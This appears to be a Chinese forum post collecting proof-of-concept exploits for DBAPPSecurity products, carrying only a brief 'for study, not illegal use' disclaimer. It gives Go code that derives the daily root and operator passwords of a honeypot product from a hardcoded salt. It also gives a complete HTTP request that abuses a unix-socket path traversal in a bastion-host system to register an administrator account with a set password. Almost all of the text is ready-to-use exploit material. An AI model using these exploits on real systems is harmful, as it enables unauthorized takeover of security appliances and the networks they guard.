安恒漏洞 PoC 整理

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

安恒蜜罐 2.0.11 提权漏洞

1. package passwd
   
2. 
   
3. import (
   
4. "crypto/sha256"
   
5. "fmt"
   
6. "time"
   
7. )
   
8. 
   
9. func Main() {
   
10. 
    
11. timestamp := time.Now().Unix()
    
12. date := time.Unix(timestamp, 0).Format("2006-01-02")
    
13. 
    
14. XXX1 := "1234567890!@#$%^&*()" + date + "root"
    
15. XXXX1 := sha256.Sum256([]byte(XXX1))
    
16. XXXXX1 := fmt.Sprintf("%x", XXXX1)[:16]
    
17. VVV1 := "1234567890!@#$%^&*()" + date + "operator"
    
18. VVVV1 := sha256.Sum256([]byte(VVV1))
    
19. VVVVV1 := fmt.Sprintf("%x", VVVV1)[:16]
    
20. println(fmt.Sprintf("[+] root     passwd ->  %s", XXXXX1))
    
21. println(fmt.Sprintf("[+] operator passwd ->  %s", VVVVV1))
    
22. 
    
23. }

复制代码

安恒明御运维审计与风险控制系统堡垒机任意用户注册

1. POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
   
2. Host: xxx
   
3. Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
   
4. Cache-Control: max-age=0
   
5. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
   
6. Sec-Ch-Ua-Mobile: ?0
   
7. Sec-Ch-Ua-Platform: "Windows"
   
8. Upgrade-Insecure-Requests: 1
   
9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
   
10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    
11. Sec-Fetch-Site: none
    
12. Sec-Fetch-Mode: navigate
    
13. Sec-Fetch-User: ?1
    
14. Sec-Fetch-Dest: document
    
15. Accept-Encoding: gzip, deflate
    
16. Accept-Language: zh-CN,zh;q=0.9
    
17. Connection: close
    
18. Content-Length: 1121
    
19. 
    
20. <?xml version="1.0"?>
    
21. <methodCall>
    
22. <methodName>web.user_add</methodName>
    
23. <params>
    
24. <param>
    
25. <value>
    
26. <array>
    
27. <data>
    
28. <value>
    
29. <string>admin</string>
    
30. </value>
    
31. <value>
    
32. <string>5</string>
    
33. </value>
    
34. <value>
    
35. <string>XX.XX.XX.XX</string>
    
36. </value>
    
37. </data>
    
38. </array>
    
39. </value>
    
40. </param>
    
41. <param>
    
42. <value>
    
43. <struct>
    
44. <member>
    
45. <name>uname</name>
    
46. <value>
    
47. <string>deptadmin</string>
    
48. </value>
    
49. </member>
    
50. <member>
    
51. <name>name</name>
    
52. <value>
    
53. <string>deptadmin</string>
    
54. </value>
    
55. </member>
    
56. <member>
    
57. <name>pwd</name>
    
58. <value>
    
59. <string>Deptadmin@123</string>
    
60. </value>
    
61. </member>
    
62. <member>
    
63. <name>authmode</name>
    
64. <value>
    
65. <string>1</string>
    
66. </value>
    
67. </member>
    
68. <member>
    
69. <name>deptid</name>
    
70. <value>
    
71. <string></string>
    
72. </value>
    
73. </member>
    
74. <member>
    
75. <name>email</name>
    
76. <value>
    
77. <string></string>
    
78. </value>
    
79. </member>
    
80. <member>
    
81. <name>mobile</name>
    
82. <value>
    
83. <string></string>
    
84. </value>
    
85. </member>
    
86. <member>
    
87. <name>comment</name>
    
88. <value>
    
89. <string></string>
    
90. </value>
    
91. </member>
    
92. <member>
    
93. <name>roleid</name>
    
94. <value>
    
95. <string>101</string>
    
96. </value>
    
97. </member>
    
98. </struct></value>
    
99. </param>
    
100. </params>
     
101. </methodCall>

复制代码